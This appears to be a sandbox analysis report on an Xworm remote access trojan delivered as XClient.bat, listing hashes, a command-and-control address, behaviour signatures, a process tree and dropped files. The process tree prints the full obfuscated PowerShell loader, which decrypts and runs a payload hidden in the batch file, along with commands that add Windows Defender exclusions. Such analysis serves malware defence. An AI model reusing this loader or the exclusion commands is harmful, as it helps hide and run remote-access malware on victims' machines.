Overview

overview

10

Static

static

1

XClient.bat

windows10-2004-x64

10

XClient.bat

windows10-ltsc 2021-x64

10

XClient.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    153s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    18-11-2024 21:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    XClient.bat

  • Size

    66KB

  • MD5

    ded6a5751236497347ed27d22226ef8d

  • SHA1

    be89ce17f8dade3336202acc0b7ac78d3f9dbdca

  • SHA256

    713b3b9b9cd5a6c17626b7f31a8173f5b397db4ea0d986114524fd988803f4f2

  • SHA512

    8356eacb14d0cb5e552d383e6a5afe0873b1de2b9f002f743bd7d7aee50748011406964407e0ea0a3e04e03677410785cd385c72d88a10ced33d9315ba427ef4

  • SSDEEP

    1536:iZAamnjGVMuIfaG8PUTjSQ3qYZmdN+p6CjQU+n2S+9Kh:WAamjVuWLTjR6YZ2Ip6CjQUo2SMQ

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

C2

name-hundred.gl.at.ply.gg:10055

Attributes
  • install_file

    Windows.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Users\Admin\AppData\Local\Temp\XClient.bat.exe
      "XClient.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $MACmm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($ctUEx in $MACmm) { if ($ctUEx.StartsWith(':: ')) { $WrLPu = $ctUEx.Substring(3); break; }; };$rNiyV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($WrLPu);$dKTzZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O3DlLOZ1HoqoHUXVbXCi17PqHhkd750PUh0uxdCau4Y=');for ($i = 0; $i -le $rNiyV.Length - 1; $i++) { $rNiyV[$i] = ($rNiyV[$i] -bxor $dKTzZ[$i % $dKTzZ.Length]); };$HeEGM = New-Object System.IO.MemoryStream(, $rNiyV);$zLsAA = New-Object System.IO.MemoryStream;$Vwwuc = New-Object System.IO.Compression.GZipStream($HeEGM, [IO.Compression.CompressionMode]::Decompress);$Vwwuc.CopyTo($zLsAA);$Vwwuc.Dispose();$HeEGM.Dispose();$zLsAA.Dispose();$rNiyV = $zLsAA.ToArray();$lapFA = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($rNiyV);$JOwJF = $lapFA.EntryPoint;$JOwJF.Invoke($null, (, [string[]] ('')))
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.bat'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.bat.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2960
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3F08.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:1260

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    627073ee3ca9676911bee35548eff2b8

    SHA1

    4c4b68c65e2cab9864b51167d710aa29ebdcff2e

    SHA256

    85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

    SHA512

    3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    408641808e457ab6e23d62e59b767753

    SHA1

    4205cfa0dfdfee6be08e8c0041d951dcec1d3946

    SHA256

    3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258

    SHA512

    e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    eaa41990580f868bff82e48d1085da73

    SHA1

    9de86c74053c0d2039bcfa693371448bde19040b

    SHA256

    693cc17bf691ad66bd10c4a9c5b224a1de0061aa3af7402cdab22a6d7f4143c1

    SHA512

    b0d5ea041f4e931e47665221c92355456dcc19ba868f2a9bdef0bb8523fc4860d6ff881c5632fb12fff69386ba7c5a1ec3845693a09c23c568330407dd4e4db3

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\XClient.bat.exe
    Filesize

    440KB

    MD5

    0e9ccd796e251916133392539572a374

    SHA1

    eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

    SHA256

    c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

    SHA512

    e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g3gehboh.grg.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmp3F08.tmp.bat
    Filesize

    163B

    MD5

    453c18f1b9dd0fdf4393158b1822235f

    SHA1

    c9d2160459873007d3d35dcde65c550cfa4e56a3

    SHA256

    2be3a5bea4ac74a347e31a19a17a833709a84bfbf6115612cb735ff5ff79e22a

    SHA512

    bfd2e75e707ca4dff34201d170f2696d6aeb8bb757c354fd5363fe9ae787dfec4a635b12a0b5595005a77488a1327485170fb36c9f4d41679468741e27d04c57

    Download Submit

  • memory/844-36-0x00007FFCA7333000-0x00007FFCA7335000-memory.dmp

    Filesize

    8KB

    Download

  • memory/844-47-0x00007FFCA7330000-0x00007FFCA7DF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/844-19-0x000001D0C8220000-0x000001D0C8236000-memory.dmp

    Filesize

    88KB

    Download

  • memory/844-54-0x00007FFCA7330000-0x00007FFCA7DF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/844-17-0x000001D0AF880000-0x000001D0AF892000-memory.dmp

    Filesize

    72KB

    Download

  • memory/844-30-0x00007FFCA7330000-0x00007FFCA7DF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/844-4-0x00007FFCA7333000-0x00007FFCA7335000-memory.dmp

    Filesize

    8KB

    Download

  • memory/844-5-0x000001D0C7E90000-0x000001D0C7EB2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/844-16-0x00007FFCA7330000-0x00007FFCA7DF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/844-15-0x00007FFCA7330000-0x00007FFCA7DF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/844-14-0x00007FFCA7330000-0x00007FFCA7DF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1068-29-0x00007FFCA7330000-0x00007FFCA7DF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1068-34-0x00007FFCA7330000-0x00007FFCA7DF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1068-31-0x00007FFCA7330000-0x00007FFCA7DF2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1068-28-0x00007FFCA7330000-0x00007FFCA7DF2000-memory.dmp

    Filesize

    10.8MB

    Download